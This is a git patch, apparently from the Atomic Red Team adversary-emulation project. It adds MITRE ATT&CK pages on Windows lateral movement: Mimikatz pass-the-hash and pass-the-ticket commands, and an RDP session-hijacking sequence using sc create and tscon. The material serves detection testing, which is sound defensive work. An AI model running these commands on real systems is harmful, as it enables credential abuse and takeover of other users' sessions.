From 0bfdcfa480409ae0c17b29bd61fc1cabdecdb479 Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Fri, 6 Apr 2018 08:21:28 -0400
Subject: [PATCH] Lateral Movement

+ PtH
+ RDP
---
 Windows/Lateral_Movement/Pass_the_Hash.md      | 15 +++++++++++++++
 .../Remote_Desktop_Protocol.md                 | 18 ++++++++++++++++++
 Windows/README.md                              |  4 ++--
 3 files changed, 35 insertions(+), 2 deletions(-)
 create mode 100644 Windows/Lateral_Movement/Pass_the_Hash.md
 create mode 100644 Windows/Lateral_Movement/Remote_Desktop_Protocol.md

diff --git a/Windows/Lateral_Movement/Pass_the_Hash.md b/Windows/Lateral_Movement/Pass_the_Hash.md
new file mode 100644
index 00000000..743754ec
--- /dev/null
+++ b/Windows/Lateral_Movement/Pass_the_Hash.md
@@ -0,0 +1,15 @@
+## Pass the Hash
+
+MITRE ATT&CK Technique: [T1075](https://attack.mitre.org/wiki/Technique/T1075)
+
+#### Mimikatz
+
+Note: must dump hashes first
+
+`mimikatz # sekurlsa::pth /user:Administrator /domain:atomic.local /ntlm:cc36cf7a8514893efccd3324464tkg1a`
+
+[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
+
+#### Kerberos Ticket attack
+
+`mimikatz # kerberos::ptt Administrator@krbtgt-atomic.LOCAL.kirbi`
diff --git a/Windows/Lateral_Movement/Remote_Desktop_Protocol.md b/Windows/Lateral_Movement/Remote_Desktop_Protocol.md
new file mode 100644
index 00000000..7c1a4fa0
--- /dev/null
+++ b/Windows/Lateral_Movement/Remote_Desktop_Protocol.md
@@ -0,0 +1,18 @@
+## Remote Desktop Protocol
+
+MITRE ATT&CK Technique: [T1076](https://attack.mitre.org/wiki/Technique/T1076)
+
+
+#### [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization
+
+retrieve the session ID:
+
+    query user
+
+Set the session ID and rdp-tcp# retrieved from `query user`
+
+    sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
+
+Access the session:
+
+    net start sesshijack
diff --git a/Windows/README.md b/Windows/README.md
index 4b49bc23..67eb9c20 100644
--- a/Windows/README.md
+++ b/Windows/README.md
@@ -6,9 +6,9 @@
 | AppCert DLLs                                          | Accessibility Features                 | Binary Padding                          | [Brute Force](Credential_Access/Brute_Force.md)                            | Application Window Discovery           | Distributed Component Object Model  | [Dynamic Data Exchange](Execution/Dynamic_Data_Exchange.md)              | [Automated Collection](Collection/Automated_Collection.md)           | [Data Compressed](Exfiltration/Data_Compressed.md)                               | Communication Through Removable Media   |
 | [AppInit DLLs](Persistence/AppInit_DLLs.md)                                          | AppCert DLLs                           | Bypass User Account Control             | [Credential Dumping](Credential_Access/Credential_Dumping.md)                     | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md)           | Exploitation of Vulnerability       | Execution through API              | [Browser Extensions](Collection/Browser_Extensions.md)             | Data Encrypted                                | Connection Proxy                        |
 | [Application Shimming](Persistence/Application_Shimming.md)                                  | AppInit DLLs                           | Code Signing                            | [Credentials in Files](Credential_Access/Credentials_in_Files.md)                   | Network Service Scanning               | [Logon Scripts](Persistence/Logon_Scripts.md)                       | Execution through Module Load      | [Clipboard Data](Collection/Clipboard_Data.md)                 | Data Transfer Size Limits                     | Custom Command and Control Protocol     |
-| [Authentication Package](Persistence/Authentication_Package.md)                                | Application Shimming                   | Component Firmware                      | Exploitation of Vulnerability          | Network Share Discovery                | Pass the Hash                       | Graphical User Interface           | [Data Staged](Collection/Data_Staged.md)                    | Exfiltration Over Alternative Protocol        | Custom Cryptographic Protocol           |
+| [Authentication Package](Persistence/Authentication_Package.md)                                | Application Shimming                   | Component Firmware                      | Exploitation of Vulnerability          | Network Share Discovery                | [Pass the Hash](Lateral_Movement/Pass_the_Hash.md)                       | Graphical User Interface           | [Data Staged](Collection/Data_Staged.md)                    | Exfiltration Over Alternative Protocol        | Custom Cryptographic Protocol           |
 | Bootkit                                               | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md)            | Component Object Model Hijacking        | Forced Authentication                  | Peripheral Device Discovery            | Pass the Ticket                     | [InstallUtil](Execution/InstallUtil.md)                        | Data from Local System         | Exfiltration Over Command and Control Channel | Data Encoding                           |
-| [Browser Extensions](Persistence/Browser_Extensions.md)                                    | DLL Search Order Hijacking             | DLL Search Order Hijacking              | Hooking                                | Permission Groups Discovery            | Remote Desktop Protocol             | LSASS Driver                       | Data from Network Shared Drive | Exfiltration Over Other Network Medium        | Data Obfuscation                        |
+| [Browser Extensions](Persistence/Browser_Extensions.md)                                    | DLL Search Order Hijacking             | DLL Search Order Hijacking              | Hooking                                | Permission Groups Discovery            | [Remote Desktop Protocol](Lateral_Movement/Remote_Desktop_Protocol.md)             | LSASS Driver                       | Data from Network Shared Drive | Exfiltration Over Other Network Medium        | Data Obfuscation                        |
 | [Change Default File Association](Persistence/Change_Default_File_Association.md)                       | Exploitation of Vulnerability          | DLL Side-Loading                        | [Input Capture](Collection/Input_Capture.md)                          | Process Discovery                      | Remote File Copy                    | [Mshta](Execution/Mshta.md)                              | Data from Removable Media      | Exfiltration Over Physical Medium             | Domain Fronting                         |
 | Component Firmware                                    | Extra Window Memory Injection          | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning                 | [Query Registry](Discovery/Query_Registry.md)                         | Remote Services                     | [PowerShell](Execution/PowerShell.md)                         | Email Collection               | Scheduled Transfer                            | Fallback Channels                       |
 | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md)                      | File System Permissions Weakness       | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md)                | Network Sniffing                       | [Remote System Discovery](Discovery/Remote_System_Discovery.md)                | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md)                     | Input Capture                  |                                               | Multi-Stage Channels                    |